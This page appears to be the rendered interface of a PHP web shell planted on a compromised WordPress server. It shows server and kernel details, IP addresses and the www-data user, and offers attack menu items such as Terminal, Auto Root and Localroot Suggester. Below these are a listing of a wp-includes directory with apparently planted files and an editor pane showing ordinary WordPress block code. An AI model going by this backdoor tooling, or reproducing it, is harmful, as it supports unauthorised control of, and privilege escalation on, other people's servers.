Linux webserver 6.8.0-49-generic #49~22.04.1-Ubuntu SMP PREEMPT_DYNAMIC Wed Nov 6 17:42:15 UTC 2 x86_64
Apache/2.4.52 (Ubuntu)
Server IP : 192.168.1.1 & Your IP : 3.148.202.74
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
theprintave /
wp-includes /
blocks /
search /
Delete
Unzip
Name
Size
Permission
Date
Action
SMTP.php
48
KB
-rw-r--r--
2025-04-15 17:44
autoloader.php
3.92
KB
-rw-r--r--
2024-11-13 12:36
block-directory-20250514003935.js
78.64
KB
-rw-r--r--
2025-04-15 17:44
block.json
1.97
KB
-rw-r--r--
2024-11-13 12:36
cache-compat.php
5.83
KB
-rw-r--r--
2022-10-10 18:22
class-http.php
367
B
-rw-r--r--
2022-06-17 11:20
class-json.php
42.66
KB
-rw-r--r--
2023-02-03 13:35
class-wp-matchesmapregex.php
1.79
KB
-rw-r--r--
2024-04-03 05:49
class-wp-oembed.php
30.91
KB
-rw-r--r--
2025-04-15 17:44
clipboard.min.js
8.8
KB
-rw-r--r--
2022-10-04 15:55
constants.php
4.06
KB
-rw-r--r--
2019-12-09 16:42
cover.php
3.1
KB
-rw-r--r--
2025-04-15 17:44
edit-post.js
120.43
KB
-rw-r--r--
2025-04-30 17:44
edit-widgets.min-20250514002642.js
57.23
KB
-rw-r--r--
2025-04-15 17:44
editor-rtl.css
360
B
-rw-r--r--
2024-11-13 12:36
editor-rtl.min.css
326
B
-rw-r--r--
2024-11-13 12:36
editor.css
360
B
-rw-r--r--
2024-11-13 12:36
editor.min.css
326
B
-rw-r--r--
2024-11-13 12:36
feed-rss-20250514221846.php
1.16
KB
-rw-r--r--
2020-01-29 00:45
feed-rss.php
1.16
KB
-rw-r--r--
2020-01-29 00:45
home-link-20250514182528.php
5.31
KB
-rw-r--r--
2025-04-15 17:44
home-link.php
5.31
KB
-rw-r--r--
2025-04-15 17:44
hooks.min-20250514002648.js
4.66
KB
-rw-r--r--
2024-11-13 12:36
latest-comments.php
4.92
KB
-rw-r--r--
2024-07-16 17:55
latest-posts.php
8.34
KB
-rw-r--r--
2024-11-13 12:36
layout.php
38.5
KB
-rw-r--r--
2025-04-15 17:44
media-views.js
266.92
KB
-rw-r--r--
2025-04-15 17:44
ms-deprecated.php
21.25
KB
-rw-r--r--
2024-07-16 17:55
ms-files-20250514184142.php
2.68
KB
-rw-r--r--
2025-04-30 17:44
patterns.min-20250514002548.js
20.95
KB
-rw-r--r--
2025-04-15 17:44
post-content.php
2.11
KB
-rw-r--r--
2024-07-16 17:55
post-terms.php
3.55
KB
-rw-r--r--
2025-04-15 17:44
shortcode.min-20250513213234.js
2.58
KB
-rw-r--r--
2022-09-23 19:55
shortcodes.php
23.49
KB
-rw-r--r--
2024-07-16 17:55
style-rtl.css
2.59
KB
-rw-r--r--
2025-04-15 17:44
style-rtl.min.css
2.34
KB
-rw-r--r--
2025-04-15 17:44
style.css
2.58
KB
-rw-r--r--
2025-04-15 17:44
style.min.css
2.33
KB
-rw-r--r--
2025-04-15 17:44
template-canvas.php
544
B
-rw-r--r--
2023-10-01 00:22
theme-rtl.css
141
B
-rw-r-----
2023-03-09 00:05
theme-rtl.min.css
126
B
-rw-r-----
2023-03-09 00:05
theme.css
141
B
-rw-r-----
2023-03-09 00:05
theme.min.css
126
B
-rw-r-----
2023-03-09 00:05
tw-sack.min.js
3.21
KB
-rw-r--r--
2022-04-08 20:07
view.asset.php
84
B
-rw-r--r--
2024-04-03 05:49
view.js
4
KB
-rw-r--r--
2025-04-15 17:44
view.min.asset.php
84
B
-rw-r--r--
2024-04-03 05:49
view.min.js
1.34
KB
-rw-r--r--
2025-04-15 17:44
zxcvbn.min.js
802.97
KB
-rw-r--r--
2019-10-26 00:17
Save
Rename
<?php /** * Server-side rendering of the `core/post-content` block. * * @package WordPress */ /** * Renders the `core/post-content` block on the server. * * @since 5.8.0 * * @param array $attributes Block attributes. * @param string $content Block default content. * @param WP_Block $block Block instance. * @return string Returns the filtered post content of the current post. */ function render_block_core_post_content( $attributes, $content, $block ) { static $seen_ids = array(); if ( ! isset( $block->context['postId'] ) ) { return ''; } $post_id = $block->context['postId']; if ( isset( $seen_ids[ $post_id ] ) ) { // WP_DEBUG_DISPLAY must only be honored when WP_DEBUG. This precedent // is set in `wp_debug_mode()`. $is_debug = WP_DEBUG && WP_DEBUG_DISPLAY; return $is_debug ? // translators: Visible only in the front end, this warning takes the place of a faulty block. __( '[block rendering halted]' ) : ''; } $seen_ids[ $post_id ] = true; // When inside the main loop, we want to use queried object // so that `the_preview` for the current post can apply. // We force this behavior by omitting the third argument (post ID) from the `get_the_content`. $content = get_the_content(); // Check for nextpage to display page links for paginated posts. if ( has_block( 'core/nextpage' ) ) { $content .= wp_link_pages( array( 'echo' => 0 ) ); } /** This filter is documented in wp-includes/post-template.php */ $content = apply_filters( 'the_content', str_replace( ']]>', ']]>', $content ) ); unset( $seen_ids[ $post_id ] ); if ( empty( $content ) ) { return ''; } $wrapper_attributes = get_block_wrapper_attributes( array( 'class' => 'entry-content' ) ); return ( '<div ' . $wrapper_attributes . '>' . $content . '</div>' ); } /** * Registers the `core/post-content` block on the server. * * @since 5.8.0 */ function register_block_core_post_content() { register_block_type_from_metadata( __DIR__ . '/post-content', array( 'render_callback' => 'render_block_core_post_content', ) ); } add_action( 'init', 'register_block_core_post_content' );